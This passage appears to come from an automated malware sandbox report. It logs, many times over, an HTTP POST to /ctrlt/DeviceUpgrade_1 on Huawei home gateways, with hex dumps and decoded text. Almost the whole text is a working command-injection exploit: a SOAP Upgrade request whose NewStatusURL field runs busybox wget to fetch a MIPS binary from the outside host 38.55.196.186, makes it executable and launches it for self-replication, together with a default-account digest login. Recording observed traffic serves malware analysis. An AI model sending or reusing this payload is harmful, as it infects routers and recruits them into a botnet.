6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
